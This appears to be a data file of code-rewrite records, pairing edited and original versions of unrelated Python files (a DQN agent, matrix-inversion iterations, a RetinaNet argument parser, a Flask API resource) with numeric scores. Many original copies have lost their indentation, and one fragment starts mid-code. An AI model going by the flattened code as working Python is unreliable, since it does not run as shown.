print('LOHPEWNTC:', LOHPEWNTC, 'LY')
print()
else:
NOW = math.ceil(NOW)
LOHPEWNTC = (LOHP - ((NOW - 1.0) * MSDBITOHP)) / NOW
print('NOW:', NOW)
print()
print('LOHPEWNTC:', LOHPEWNTC, 'LY')
print()
if LOHPEWNTC > MaxLOHPCWWOVD:
LOEW = MinLOW * (LOHPEWNTC / MinLOHP)
DOEW = MaxDOW
print('LOEW:', LOEW, 'Km')
print()
print('DOEW:', DOEW, 'Km')
print()
else:
LOEW = MinLOW * (LOHPEWNTC / MinLOHP)
MF = math.sqrt(LOHPEWNTC / MinLOHP)
## MF means Multiplication Factor.
DOEW = MinDOW * MF - (HC * MF - HC)
print('LOEW:', LOEW, 'Km')
print()
print('DOEW:', DOEW, 'Km')
print()
#FOc = 0.125 #<<----
# FOc means Fraction Of c. The sub-light velocity that the ship uses between intermediate terminals. 0.125 should be used to cut
# down some time while still having adequate sensor capability. Unhashtag to test.
#TTTHP = NOW * LOHPEWNTC / 64.0 + ((NOW - 1.0) * MSDBITOHP / FOc)
## TTTHP means Time To Travel HP. Unhashtag to test.
#print("TTTHP:", TTTHP, "years,", TTTHP * 12, "months,", TTTHP * 365, "days")
## Unhashtag to test.
#print((NOW - 1.0) * MSDBITOHP / FOc * 365, "days to travel distance between all intermediate terminals of the HPs")
## Unhashtag to test.
#print((NOW - 1.0) * MSDBITOHP / FOc * 365 * 24, "hours to travel distance between all intermediate terminals of the HPs")
## Unhashtag to test. | 0.435902 | 0.519278 |
import argparse
import numpy as np
import os
import sys
import random
import torch
from replaybuffer import ReplayBuffer
from network import LinearNetwork, ConvNetwork
class Agent(object):
"""Agent is defined here
"""
    def __init__(self, args):
        """Build the DQN-style agent from parsed CLI arguments.

        Creates the online and target networks ("linear" or "conv" mode),
        optionally loads pretrained weights, syncs the target network, and
        sets up the optimizer. All networks are moved to CUDA.
        """
        self.is_training = not args.eval
        self.mode = args.mode
        self.load_pretrained = args.load_pretrained
        # The replay buffer must be able to hold at least one batch.
        assert args.buffer_size >= args.batch_size
        self.batch_size = args.batch_size
        self.buffer = ReplayBuffer(args.buffer_size)
        self.grid_size = args.grid_size
        self.state_dim = args.state_dim
        self.action_dim = args.action_dim
        self.gamma = args.gamma
        self.lr = args.lr
        self.optimizer = args.optimizer
        self.save_weights_dir = args.save_weights_dir
        self.weight_decay = args.weight_decay
        self.model = None
        self.target_model = None
        # ADMM-pruned model is loaded lazily via load_admm_model().
        self.load_admm = False
        self.admm_model = None
        if self.mode == "linear":
            self.model = LinearNetwork(self.state_dim, self.action_dim).cuda()
            self.target_model = LinearNetwork(self.state_dim, self.action_dim).cuda()
        elif self.mode == "conv":
            self.model = ConvNetwork(self.grid_size, self.action_dim).cuda()
            self.target_model = ConvNetwork(self.grid_size, self.action_dim).cuda()
        # An unknown mode would leave both networks as None.
        assert self.model is not None
        assert self.target_model is not None
        # Start with target == online weights.
        self.update_target()
        if self.load_pretrained:
            pre_weight_path = os.path.join(self.save_weights_dir, 'pretrained', 'saved_weights_{}.pth.tar'.format(self.mode))
            if os.path.isfile(pre_weight_path):
                print("=> loading checkpoint '{}'".format(pre_weight_path))
                checkpoint = torch.load(pre_weight_path)
                # NOTE: only the online model is restored here; the target
                # keeps the pre-load weights until the next update_target().
                self.model.load_state_dict(checkpoint['state_dict'])
            else:
                raise ValueError('Weight path does not exist.')
        self.model.train()
        self.target_model.eval()
        self.reset_optimizer(self.lr)
def print_model_weight(self):
"""print model weights
"""
for name, param in self.model.named_parameters():
if param.requires_grad:
print(name, param.data)
def reset_optimizer(self, lr):
"""reset optimizer learning rate.
"""
if self.optimizer == 'adam':
self.model_optim = torch.optim.Adam(self.model.parameters(), lr=lr)
elif self.optimizer == 'sgd':
self.model_optim = torch.optim.SGD(self.model.parameters(), lr=lr, momentum=0.5, weight_decay=self.weight_decay)
return
def update_target(self):
"""uodate target network weigths
"""
print("=> updating target network weights...")
self.target_model.load_state_dict(self.model.state_dict())
def load_admm_model(self):
"""load admm pruned model
"""
if self.mode == "linear":
self.admm_model = LinearNetwork(self.state_dim, self.action_dim).cuda()
if self.mode == "conv":
self.admm_model = ConvNetwork(self.grid_size, self.action_dim).cuda()
assert self.admm_model is not None
admm_weight_path = os.path.join(self.save_weights_dir, self.mode, 'saved_weights_{}.pth.tar'.format(self.mode))
if os.path.isfile(admm_weight_path):
print("=> loading ADMM checkpoint '{}'".format(admm_weight_path))
checkpoint = torch.load(admm_weight_path)
self.admm_model.load_state_dict(checkpoint['state_dict'])
else:
raise ValueError('ADMM weight path does not exist.')
self.admm_model.eval()
def act(self, state, epsilon=0.0):
    """Choose an action epsilon-greedily from the current state.

    Args:
        state: observation array, or a tuple of arrays for multi-part
            observations.
        epsilon (float): exploration probability; forced to 0 outside training.

    Returns:
        int: index of the chosen action.
    """
    if not self.is_training:
        epsilon = 0.0
    # '>=' (not '>') so epsilon == 0.0 can never fall through to the random
    # branch: random.random() may return exactly 0.0, and the original then
    # crashed evaluation on an `assert self.is_training` in the else branch.
    if random.random() >= epsilon:
        if isinstance(state, tuple):
            state_var = tuple(
                torch.tensor(part, dtype=torch.float).unsqueeze(0).cuda()
                for part in state)
        else:
            state_var = torch.tensor(
                state, dtype=torch.float).unsqueeze(0).cuda()
        # Use the ADMM-pruned network when requested, else the online model.
        net = self.admm_model if self.load_admm else self.model
        net.eval()
        logits = net(state_var).detach().cpu().numpy()
        action = int(np.argmax(logits))
    else:
        # Only reachable with epsilon > 0, i.e. during training.
        action = random.randrange(self.action_dim)
    return action
def learning(self):
    """Sample a batch from the replay buffer and take one DQN gradient step.

    Returns:
        float: scalar training loss, max(MSE, MAE) of the TD error.
    """
    batch = self.buffer.sample(self.batch_size)
    states_curt, action_curt, rewards_curt, states_next, is_dones = \
        self._stack_to_numpy(batch)

    def _as_cuda(data, dtype):
        # Multi-part observations arrive as tuples of stacked arrays.
        if isinstance(data, tuple):
            return tuple(torch.tensor(part, dtype=dtype).cuda() for part in data)
        return torch.tensor(data, dtype=dtype).cuda()

    states_curt_var = _as_cuda(states_curt, torch.float)
    action_curt_var = _as_cuda(action_curt, torch.long)
    rewards_curt_var = _as_cuda(rewards_curt, torch.float)
    states_next_var = _as_cuda(states_next, torch.float)
    is_dones_var = _as_cuda(is_dones, torch.float)

    if self.is_training:  # and not self.load_pretrained:
        self.model.train()
    else:
        self.model.eval()

    # Q(s, a) for the actions that were actually taken.
    q_value = self.model(states_curt_var).gather(
        1, action_curt_var.unsqueeze(1)).squeeze(1)
    # Bootstrapped one-step target from the frozen target network.
    next_q_value = self.target_model(states_next_var).max(1)[0]
    expected_q_value = rewards_curt_var + \
        self.gamma * next_q_value * (1 - is_dones_var)

    loss_mse = (q_value - expected_q_value.detach()).pow(2).mean()
    loss_mae = torch.abs(q_value - expected_q_value.detach()).mean()
    loss = torch.max(loss_mse, loss_mae)

    self.model_optim.zero_grad()
    loss.backward()
    self.model_optim.step()
    return loss.detach().item()
def eval_learning(self):
    """Estimate the TD loss on one sampled batch WITHOUT updating any weights.

    Mirrors learning() but runs under torch.no_grad() and never touches the
    optimizer: the original implementation called zero_grad/backward/step here,
    which silently trained the network during evaluation; it could also leave
    the model in train() mode.

    Returns:
        float: max(MSE, MAE) TD loss over the sampled batch.
    """
    batch = self.buffer.sample(self.batch_size)
    states_curt, action_curt, rewards_curt, states_next, is_dones = \
        self._stack_to_numpy(batch)

    def _as_cuda(data, dtype):
        # Multi-part observations arrive as tuples of stacked arrays.
        if isinstance(data, tuple):
            return tuple(torch.tensor(part, dtype=dtype).cuda() for part in data)
        return torch.tensor(data, dtype=dtype).cuda()

    states_curt_var = _as_cuda(states_curt, torch.float)
    action_curt_var = _as_cuda(action_curt, torch.long)
    rewards_curt_var = _as_cuda(rewards_curt, torch.float)
    states_next_var = _as_cuda(states_next, torch.float)
    is_dones_var = _as_cuda(is_dones, torch.float)

    self.model.eval()
    with torch.no_grad():
        q_value = self.model(states_curt_var).gather(
            1, action_curt_var.unsqueeze(1)).squeeze(1)
        next_q_value = self.target_model(states_next_var).max(1)[0]
        expected_q_value = rewards_curt_var + \
            self.gamma * next_q_value * (1 - is_dones_var)
        loss_mse = (q_value - expected_q_value).pow(2).mean()
        loss_mae = torch.abs(q_value - expected_q_value).mean()
        loss = torch.max(loss_mse, loss_mae)
    return loss.item()
def _stack_to_numpy(self, data_list):
ret = []
for temp_data in data_list:
if isinstance(temp_data[0], tuple):
temp_list = []
tuple_size = len(temp_data[0])
for _ in range(tuple_size):
temp_list.append([])
for curt_tup in temp_data:
for idx in range(tuple_size):
temp_list[idx].append(curt_tup[idx])
temp_ret_list = []
for temp in temp_list:
temp_ret_list.append(np.array(temp))
ret.append(tuple(temp_ret_list))
else:
temp_np = np.array(temp_data)
ret.append(temp_np)
return ret | agent.py | import argparse
import numpy as np
import os
import sys
import random
import torch
from replaybuffer import ReplayBuffer
from network import LinearNetwork, ConvNetwork
class Agent(object):
"""Agent is defined here
"""
def __init__(self, args):
self.is_training = not args.eval
self.mode = args.mode
self.load_pretrained = args.load_pretrained
assert args.buffer_size >= args.batch_size
self.batch_size = args.batch_size
self.buffer = ReplayBuffer(args.buffer_size)
self.grid_size = args.grid_size
self.state_dim = args.state_dim
self.action_dim = args.action_dim
self.gamma = args.gamma
self.lr = args.lr
self.optimizer = args.optimizer
self.save_weights_dir = args.save_weights_dir
self.weight_decay = args.weight_decay
self.model = None
self.target_model = None
self.load_admm = False
self.admm_model = None
if self.mode == "linear":
self.model = LinearNetwork(self.state_dim, self.action_dim).cuda()
self.target_model = LinearNetwork(self.state_dim, self.action_dim).cuda()
elif self.mode == "conv":
self.model = ConvNetwork(self.grid_size, self.action_dim).cuda()
self.target_model = ConvNetwork(self.grid_size, self.action_dim).cuda()
assert self.model is not None
assert self.target_model is not None
self.update_target()
if self.load_pretrained:
pre_weight_path = os.path.join(self.save_weights_dir, 'pretrained', 'saved_weights_{}.pth.tar'.format(self.mode))
if os.path.isfile(pre_weight_path):
print("=> loading checkpoint '{}'".format(pre_weight_path))
checkpoint = torch.load(pre_weight_path)
self.model.load_state_dict(checkpoint['state_dict'])
else:
raise ValueError('Weight path does not exist.')
self.model.train()
self.target_model.eval()
self.reset_optimizer(self.lr)
def print_model_weight(self):
"""print model weights
"""
for name, param in self.model.named_parameters():
if param.requires_grad:
print(name, param.data)
def reset_optimizer(self, lr):
"""reset optimizer learning rate.
"""
if self.optimizer == 'adam':
self.model_optim = torch.optim.Adam(self.model.parameters(), lr=lr)
elif self.optimizer == 'sgd':
self.model_optim = torch.optim.SGD(self.model.parameters(), lr=lr, momentum=0.5, weight_decay=self.weight_decay)
return
def update_target(self):
"""uodate target network weigths
"""
print("=> updating target network weights...")
self.target_model.load_state_dict(self.model.state_dict())
def load_admm_model(self):
"""load admm pruned model
"""
if self.mode == "linear":
self.admm_model = LinearNetwork(self.state_dim, self.action_dim).cuda()
if self.mode == "conv":
self.admm_model = ConvNetwork(self.grid_size, self.action_dim).cuda()
assert self.admm_model is not None
admm_weight_path = os.path.join(self.save_weights_dir, self.mode, 'saved_weights_{}.pth.tar'.format(self.mode))
if os.path.isfile(admm_weight_path):
print("=> loading ADMM checkpoint '{}'".format(admm_weight_path))
checkpoint = torch.load(admm_weight_path)
self.admm_model.load_state_dict(checkpoint['state_dict'])
else:
raise ValueError('ADMM weight path does not exist.')
self.admm_model.eval()
def act(self, state, epsilon=0.0):
"""Output an action.
"""
if not self.is_training:
epsilon = 0.0
if random.random() > epsilon:
if isinstance(state, tuple):
state_var = []
for temp in state:
state_var.append(
torch.tensor(
temp, dtype=torch.float).unsqueeze(0).cuda()
)
state_var = tuple(state_var)
else:
state_var = torch.tensor(
state, dtype=torch.float).unsqueeze(0).cuda()
if not self.load_admm:
self.model.eval()
logits = self.model(state_var).detach().cpu().numpy()
else:
self.admm_model.eval()
logits = self.admm_model(state_var).detach().cpu().numpy()
action = np.argmax(logits)
else:
assert self.is_training == True
action = random.randrange(self.action_dim)
return action
def learning(self):
"""Extract from buffer and train for one epoch.
"""
data_list = self.buffer.sample(self.batch_size)
(states_curt, action_curt, rewards_curt, states_next, is_dones) = \
self._stack_to_numpy(data_list)
if isinstance(states_curt, tuple):
states_curt_var = []
for temp in states_curt:
states_curt_var.append(
torch.tensor(temp, dtype=torch.float).cuda())
states_curt_var = tuple(states_curt_var)
else:
states_curt_var = torch.tensor(
states_curt, dtype=torch.float).cuda()
action_curt_var = torch.tensor(
action_curt, dtype=torch.long).cuda()
rewards_curt_var = torch.tensor(
rewards_curt, dtype=torch.float).cuda()
if isinstance(states_next, tuple):
states_next_var = []
for temp in states_next:
states_next_var.append(
torch.tensor(temp, dtype=torch.float).cuda())
states_next_var = tuple(states_next_var)
else:
states_next_var = torch.tensor(
states_next, dtype=torch.float).cuda()
is_dones_var = torch.tensor(
is_dones, dtype=torch.float).cuda()
if self.is_training: # and not self.load_pretrained:
self.model.train()
else:
self.model.eval()
logits_curt_var = self.model(states_curt_var)
q_value = logits_curt_var.gather(1, action_curt_var.unsqueeze(1)).squeeze(1)
logits_next_var = self.target_model(states_next_var)
next_q_value = logits_next_var.max(1)[0]
expected_q_value = rewards_curt_var + \
self.gamma * next_q_value * (1 - is_dones_var)
loss_mse = (q_value - expected_q_value.detach()).pow(2).mean()
loss_mae = torch.abs(q_value - expected_q_value.detach()).mean()
loss = torch.max(loss_mse, loss_mae)
self.model_optim.zero_grad()
loss.backward()
self.model_optim.step()
return loss.detach().item()
def eval_learning(self):
"""Extract from buffer and eval for one epoch.
"""
data_list = self.buffer.sample(self.batch_size)
(states_curt, action_curt, rewards_curt, states_next, is_dones) = \
self._stack_to_numpy(data_list)
if isinstance(states_curt, tuple):
states_curt_var = []
for temp in states_curt:
states_curt_var.append(
torch.tensor(temp, dtype=torch.float).cuda())
states_curt_var = tuple(states_curt_var)
else:
states_curt_var = torch.tensor(
states_curt, dtype=torch.float).cuda()
action_curt_var = torch.tensor(
action_curt, dtype=torch.long).cuda()
rewards_curt_var = torch.tensor(
rewards_curt, dtype=torch.float).cuda()
if isinstance(states_next, tuple):
states_next_var = []
for temp in states_next:
states_next_var.append(
torch.tensor(
temp, dtype=torch.float).cuda()
)
states_next_var = tuple(states_next_var)
else:
states_next_var = torch.tensor(
states_next, dtype=torch.float).cuda()
is_dones_var = torch.tensor(
is_dones, dtype=torch.float).cuda()
if self.is_training: # and not self.load_pretrained:
self.model.train()
else:
self.model.eval()
logits_curt_var = self.model(states_curt_var)
logits_next_var = self.target_model(states_next_var)
next_q_value = logits_next_var.max(1)[0]
q_value = logits_curt_var.gather(1, action_curt_var.unsqueeze(1)).squeeze(1)
expected_q_value = rewards_curt_var + \
self.gamma * next_q_value * (1 - is_dones_var)
loss_mse = (q_value - expected_q_value.detach()).pow(2).mean()
loss_mae = torch.abs(q_value - expected_q_value.detach()).mean()
loss = torch.max(loss_mse, loss_mae)
self.model_optim.zero_grad()
loss.backward()
self.model_optim.step()
return loss.detach().item()
def _stack_to_numpy(self, data_list):
ret = []
for temp_data in data_list:
if isinstance(temp_data[0], tuple):
temp_list = []
tuple_size = len(temp_data[0])
for _ in range(tuple_size):
temp_list.append([])
for curt_tup in temp_data:
for idx in range(tuple_size):
temp_list[idx].append(curt_tup[idx])
temp_ret_list = []
for temp in temp_list:
temp_ret_list.append(np.array(temp))
ret.append(tuple(temp_ret_list))
else:
temp_np = np.array(temp_data)
ret.append(temp_np)
return ret | 0.444083 | 0.20834 |
import numpy as np
# Convergence tolerance on successive iterates; note 10e-10 == 1e-9.
epsilon = 10e-10
# Safety cap on the number of iterations per scheme.
kmax = 10000
def identity_minus(A, nr):
    """Return nr * I - A as a new array; A itself is left untouched."""
    result = -A
    np.fill_diagonal(result, result.diagonal() + nr)
    return result
def identity_plus(A, nr):
    """Return A + nr * I as a new array.

    The original mutated A in place and returned it, silently corrupting any
    array the caller still held; work on a copy instead. The only visible
    caller (get_next_li2) uses the return value, so this is fully compatible.
    """
    result = A.copy()
    np.fill_diagonal(result, result.diagonal() + nr)
    return result
def get_solution_norm(A):
    """Maximum absolute row sum (infinity norm) over the leading len(A)
    columns; 0 for an empty matrix."""
    n = len(A)
    return max((sum(abs(A[i][j]) for j in range(n)) for i in range(n)),
               default=0)
def get_next_schultz(A, V):
    """One Schultz iteration: V_{k+1} = V_k (2I - A V_k)."""
    correction = identity_minus(np.matmul(A, V), 2)
    return np.matmul(V, correction)
def get_next_li1(A, V):
    """One third-order Li iteration: V (3I - AV (3I - AV))."""
    av = np.matmul(A, V)
    inner = np.matmul(av, identity_minus(av, 3))
    return np.matmul(V, identity_minus(inner, 3))
def get_next_li2(A, V):
    """One Li iteration: V_{k+1} = (I + 1/4 (I - VA)(3I - VA)^2) V.

    The original computed an `identity = np.identity(len(A))` that was never
    used; removed.
    """
    VA = np.matmul(V, A)
    quarter_residual = (1 / 4) * identity_minus(VA, 1)
    three_minus_va = identity_minus(VA, 3)
    squared = np.matmul(three_minus_va, three_minus_va)
    return np.matmul(identity_plus(np.matmul(quarter_residual, squared), 1), V)
def get_initial_matrix(A):
    """Initial guess V0 = A^T / (||A||_1 * ||A||_inf) for the Newton-Schultz
    iteration family."""
    norm_1 = np.abs(A).sum(axis=0).max()      # max absolute column sum
    norm_inf = np.abs(A).sum(axis=1).max()    # max absolute row sum
    return A.T / (norm_1 * norm_inf)
def generate_matrix(n):
    """n x n upper-bidiagonal test matrix: ones on the diagonal, fours on the
    superdiagonal."""
    matrix = np.identity(n)
    rows = np.arange(n - 1)
    matrix[rows, rows + 1] = 4
    return matrix
def solve(alg):
    """Iteratively approximate A^-1 with scheme `alg` (1 = Schultz, 2 = Li-1,
    3 = Li-2) on a fixed 10x10 test matrix, printing convergence diagnostics.
    """
    A = generate_matrix(10)
    #A = np.random.rand(500, 500) * 1000
    # Both names start at the same initial guess; V_next is reassigned by the
    # chosen scheme each pass through the loop.
    V_prev = V_next = get_initial_matrix(A)
    k = 0
    norm = 10e9  # sentinel above epsilon so the loop runs at least once
    # Stop when the iterates stop changing (norm < epsilon), blow up past
    # 10e10, or the iteration budget kmax is exhausted.
    while 10e10 >= norm >= epsilon and k < kmax:
        if alg == 1:
            V_next = get_next_schultz(A, V_prev)
        elif alg == 2:
            V_next = get_next_li1(A, V_prev)
        elif alg == 3:
            V_next = get_next_li2(A, V_prev)
        norm = np.linalg.norm(V_next - V_prev)
        k += 1
        V_prev = V_next
    print("\titerations = ", k)
    if norm < epsilon:
        print("\tconvergence")
        # Residual ||A V - I|| measured in the max-absolute-row-sum norm.
        result_norm = get_solution_norm(np.matmul(A, V_next) - np.identity(len(A)))
        print("\tnorm = ", result_norm)
    else:
        print("\tdivergence\n")
if __name__ == '__main__':
    # Run each inversion scheme in turn. The first label was misspelled
    # "Schlutz" in the original output; the trailing line was also fused with
    # dataset-export residue and has been restored.
    print("Schultz: ")
    solve(1)
    print("Li 1: ")
    solve(2)
    print("Li 2: ")
    solve(3)
epsilon = 10e-10
kmax = 10000
def identity_minus(A, nr):
X = A * -1
for i in range(len(X)):
X[i, i] = nr + X[i, i]
return X
def identity_plus(A, nr):
for i in range(len(A)):
A[i, i] = A[i, i] + nr
return A
def get_solution_norm(A):
max_sum_line = 0
for i in range(0, len(A)):
current_sum = 0
for j in range(0, len(A)):
current_sum += abs(A[i][j])
if current_sum > max_sum_line:
max_sum_line = current_sum
return max_sum_line
def get_next_schultz(A, V):
return np.matmul(V, identity_minus(np.matmul(A, V), 2))
def get_next_li1(A, V):
AV = np.matmul(A, V)
aux = np.matmul(AV, identity_minus(AV, 3))
return np.matmul(V, identity_minus(aux, 3))
def get_next_li2(A, V):
identity = np.identity(len(A))
VA = np.matmul(V, A)
aux1 = (1/4) * identity_minus(VA, 1)
VA_identity = identity_minus(VA, 3)
aux2 = np.matmul(VA_identity, VA_identity)
return np.matmul(identity_plus(np.matmul(aux1, aux2), 1), V)
def get_initial_matrix(A):
transposed = np.transpose(A)
max_sum_column = np.abs(A).sum(axis=0).max()
max_sum_line = np.abs(A).sum(axis=1).max()
return transposed / (max_sum_line * max_sum_column)
def generate_matrix(n):
matrix = np.identity(n)
for i in range(0, n-1):
matrix[i, i+1] = 4
return matrix
def solve(alg):
A = generate_matrix(10)
#A = np.random.rand(500, 500) * 1000
V_prev = V_next = get_initial_matrix(A)
k = 0
norm = 10e9
while 10e10 >= norm >= epsilon and k < kmax:
if alg == 1:
V_next = get_next_schultz(A, V_prev)
elif alg == 2:
V_next = get_next_li1(A, V_prev)
elif alg == 3:
V_next = get_next_li2(A, V_prev)
norm = np.linalg.norm(V_next - V_prev)
k += 1
V_prev = V_next
print("\titerations = ", k)
if norm < epsilon:
print("\tconvergence")
result_norm = get_solution_norm(np.matmul(A, V_next) - np.identity(len(A)))
print("\tnorm = ", result_norm)
else:
print("\tdivergence\n")
if __name__ == '__main__':
print("Schlutz: ")
solve(1)
print("Li 1: ")
solve(2)
print("Li 2: ")
solve(3) | 0.285671 | 0.411702 |
import argparse
def parse_args(args):
""" Parse the arguments.
"""
parser = argparse.ArgumentParser(description='Simple training script for training a RetinaNet network.')
subparsers = parser.add_subparsers(help='Arguments for specific dataset types.', dest='dataset_type')
subparsers.required = True
coco_parser = subparsers.add_parser('coco')
coco_parser.add_argument('coco_path', help='Path to dataset directory (ie. /tmp/COCO).')
pascal_parser = subparsers.add_parser('pascal')
pascal_parser.add_argument('pascal_path', help='Path to dataset directory (ie. /tmp/VOCdevkit).')
kitti_parser = subparsers.add_parser('kitti')
kitti_parser.add_argument('kitti_path', help='Path to dataset directory (ie. /tmp/kitti).')
def csv_list(string):
return string.split(',')
oid_parser = subparsers.add_parser('oid')
oid_parser.add_argument('main_dir', help='Path to dataset directory.')
oid_parser.add_argument('--version', help='The current dataset version is v4.', default='v4')
oid_parser.add_argument('--labels-filter', help='A list of labels to filter.', type=csv_list, default=None)
oid_parser.add_argument('--annotation-cache-dir', help='Path to store annotation cache.', default='.')
oid_parser.add_argument('--parent-label', help='Use the hierarchy children of this label.', default=None)
csv_parser = subparsers.add_parser('csv')
csv_parser.add_argument('annotations', help='Path to CSV file containing annotations for training.')
csv_parser.add_argument('classes', help='Path to a CSV file containing class label mapping.')
csv_parser.add_argument('--val-annotations', help='Path to CSV file containing annotations for validation (optional).')
group = parser.add_mutually_exclusive_group()
group.add_argument('--snapshot', help='Resume training from a snapshot.')
group.add_argument('--imagenet-weights', help='Initialize the model with pretrained imagenet weights. This is the default behaviour.', action='store_const', const=True, default=True)
group.add_argument('--weights', help='Initialize the model with weights from a file.')
group.add_argument('--no-weights', help='Don\'t initialize the model with any weights.', dest='imagenet_weights', action='store_const', const=False)
parser.add_argument('--backbone', help='Backbone model used by retinanet.', default='resnet50', type=str)
parser.add_argument('--batch-size', help='Size of the batches.', default=1, type=int)
parser.add_argument('--gpu', help='Id of the GPU to use (as reported by nvidia-smi).')
parser.add_argument('--multi-gpu', help='Number of GPUs to use for parallel processing.', type=int, default=0)
parser.add_argument('--multi-gpu-force', help='Extra flag needed to enable (experimental) multi-gpu support.', action='store_true')
parser.add_argument('--epochs', help='Number of epochs to train.', type=int, default=50)
parser.add_argument('--steps', help='Number of steps per epoch.', type=int, default=10000)
parser.add_argument('--lr', help='Learning rate.', type=float, default=1e-5)
parser.add_argument('--snapshot-path', help='Path to store snapshots of models during training (defaults to \'./snapshots\')', default='./snapshots')
parser.add_argument('--tensorboard-dir', help='Log directory for Tensorboard output', default='./logs')
parser.add_argument('--no-snapshots', help='Disable saving snapshots.', dest='snapshots', action='store_false')
parser.add_argument('--no-evaluation', help='Disable per epoch evaluation.', dest='evaluation', action='store_false')
parser.add_argument('--freeze-backbone', help='Freeze training of backbone layers.', action='store_true')
parser.add_argument('--random-transform', help='Randomly transform image and annotations.', action='store_true')
parser.add_argument('--image-min-side', help='Rescale the image so the smallest side is min_side.', type=int, default=800)
parser.add_argument('--image-max-side', help='Rescale the image if the largest side is larger than max_side.', type=int, default=1333)
parser.add_argument('--config', help='Path to a configuration parameters .ini file.')
parser.add_argument('--weighted-average', help='Compute the mAP using the weighted average of precisions among classes.', action='store_true')
parser.add_argument('--compute-val-loss', help='Compute validation loss during training', dest='compute_val_loss', action='store_true')
# Fit generator arguments
parser.add_argument('--multiprocessing', help='Use multiprocessing in fit_generator.', action='store_true')
parser.add_argument('--workers', help='Number of generator workers.', type=int, default=1)
parser.add_argument('--max-queue-size', help='Queue length for multiprocessing workers in fit_generator.', type=int, default=10)
return parser.parse_args(args) | yolk/parser.py | import argparse
def parse_args(args):
""" Parse the arguments.
"""
parser = argparse.ArgumentParser(description='Simple training script for training a RetinaNet network.')
subparsers = parser.add_subparsers(help='Arguments for specific dataset types.', dest='dataset_type')
subparsers.required = True
coco_parser = subparsers.add_parser('coco')
coco_parser.add_argument('coco_path', help='Path to dataset directory (ie. /tmp/COCO).')
pascal_parser = subparsers.add_parser('pascal')
pascal_parser.add_argument('pascal_path', help='Path to dataset directory (ie. /tmp/VOCdevkit).')
kitti_parser = subparsers.add_parser('kitti')
kitti_parser.add_argument('kitti_path', help='Path to dataset directory (ie. /tmp/kitti).')
def csv_list(string):
return string.split(',')
oid_parser = subparsers.add_parser('oid')
oid_parser.add_argument('main_dir', help='Path to dataset directory.')
oid_parser.add_argument('--version', help='The current dataset version is v4.', default='v4')
oid_parser.add_argument('--labels-filter', help='A list of labels to filter.', type=csv_list, default=None)
oid_parser.add_argument('--annotation-cache-dir', help='Path to store annotation cache.', default='.')
oid_parser.add_argument('--parent-label', help='Use the hierarchy children of this label.', default=None)
csv_parser = subparsers.add_parser('csv')
csv_parser.add_argument('annotations', help='Path to CSV file containing annotations for training.')
csv_parser.add_argument('classes', help='Path to a CSV file containing class label mapping.')
csv_parser.add_argument('--val-annotations', help='Path to CSV file containing annotations for validation (optional).')
group = parser.add_mutually_exclusive_group()
group.add_argument('--snapshot', help='Resume training from a snapshot.')
group.add_argument('--imagenet-weights', help='Initialize the model with pretrained imagenet weights. This is the default behaviour.', action='store_const', const=True, default=True)
group.add_argument('--weights', help='Initialize the model with weights from a file.')
group.add_argument('--no-weights', help='Don\'t initialize the model with any weights.', dest='imagenet_weights', action='store_const', const=False)
parser.add_argument('--backbone', help='Backbone model used by retinanet.', default='resnet50', type=str)
parser.add_argument('--batch-size', help='Size of the batches.', default=1, type=int)
parser.add_argument('--gpu', help='Id of the GPU to use (as reported by nvidia-smi).')
parser.add_argument('--multi-gpu', help='Number of GPUs to use for parallel processing.', type=int, default=0)
parser.add_argument('--multi-gpu-force', help='Extra flag needed to enable (experimental) multi-gpu support.', action='store_true')
parser.add_argument('--epochs', help='Number of epochs to train.', type=int, default=50)
parser.add_argument('--steps', help='Number of steps per epoch.', type=int, default=10000)
parser.add_argument('--lr', help='Learning rate.', type=float, default=1e-5)
parser.add_argument('--snapshot-path', help='Path to store snapshots of models during training (defaults to \'./snapshots\')', default='./snapshots')
parser.add_argument('--tensorboard-dir', help='Log directory for Tensorboard output', default='./logs')
parser.add_argument('--no-snapshots', help='Disable saving snapshots.', dest='snapshots', action='store_false')
parser.add_argument('--no-evaluation', help='Disable per epoch evaluation.', dest='evaluation', action='store_false')
parser.add_argument('--freeze-backbone', help='Freeze training of backbone layers.', action='store_true')
parser.add_argument('--random-transform', help='Randomly transform image and annotations.', action='store_true')
parser.add_argument('--image-min-side', help='Rescale the image so the smallest side is min_side.', type=int, default=800)
parser.add_argument('--image-max-side', help='Rescale the image if the largest side is larger than max_side.', type=int, default=1333)
parser.add_argument('--config', help='Path to a configuration parameters .ini file.')
parser.add_argument('--weighted-average', help='Compute the mAP using the weighted average of precisions among classes.', action='store_true')
parser.add_argument('--compute-val-loss', help='Compute validation loss during training', dest='compute_val_loss', action='store_true')
# Fit generator arguments
parser.add_argument('--multiprocessing', help='Use multiprocessing in fit_generator.', action='store_true')
parser.add_argument('--workers', help='Number of generator workers.', type=int, default=1)
parser.add_argument('--max-queue-size', help='Queue length for multiprocessing workers in fit_generator.', type=int, default=10)
return parser.parse_args(args) | 0.630912 | 0.239505 |
from flask import request
from flask_jwt_extended import get_jwt_identity, jwt_required
from flask_restful import Resource
from ...models import Collaboration
from ...schemas import CollaborationSchema
from .responses import respond
class CollaborationListResource(Resource):
    """REST collection endpoint for collaborations on a growthbook.

    NOTE(review): Fields, Growthbook, User, DoesNotExist, ValidationError and
    NotUniqueError are referenced but absent from this module's visible import
    block -- presumably imported elsewhere in the real file; verify.
    """

    @jwt_required
    def get(self):
        """List a growthbook's collaborations (compact form), 404 if the
        growthbook is missing, 403 for non-collaborators."""
        schema = CollaborationSchema(many=True, only=Fields.Collaboration.compact)
        try:
            growthbook = Growthbook.objects.get(id=request.args['growthbook_id'])
        except (DoesNotExist, ValidationError) as e:
            return respond(404, {}, ['Growthbook does not exist', str(e)])
        collaborations = growthbook.collaborations
        # Only existing collaborators may list collaborations.
        if get_jwt_identity() not in growthbook.collaborating_identities():
            return respond(403, {}, ['Access forbidden'])
        return respond(200, {'collaborations': schema.dump(collaborations).data})

    @jwt_required
    def post(self):
        """Invite a user to collaborate on a growthbook; 201 with the new
        collaboration on success."""
        schema = CollaborationSchema()
        collaboration = Collaboration(**schema.load(request.args).data)
        # The authenticated caller is recorded as the inviter.
        collaboration.inviter = User.objects.get(username=get_jwt_identity())
        try:
            collaboration.invited = User.objects.get(username=request.args['username'])
        except (DoesNotExist, ValidationError) as e:
            return respond(404, {}, ['User does not exist', str(e)])
        try:
            growthbook = Growthbook.objects.get(id=request.args['growthbook_id'])
        except (DoesNotExist, ValidationError) as e:
            return respond(404, {}, ['Growthbook does not exist', str(e)])
        # Only existing collaborators may invite new ones.
        if get_jwt_identity() not in growthbook.collaborating_identities():
            return respond(403, {}, ['Access forbidden'])
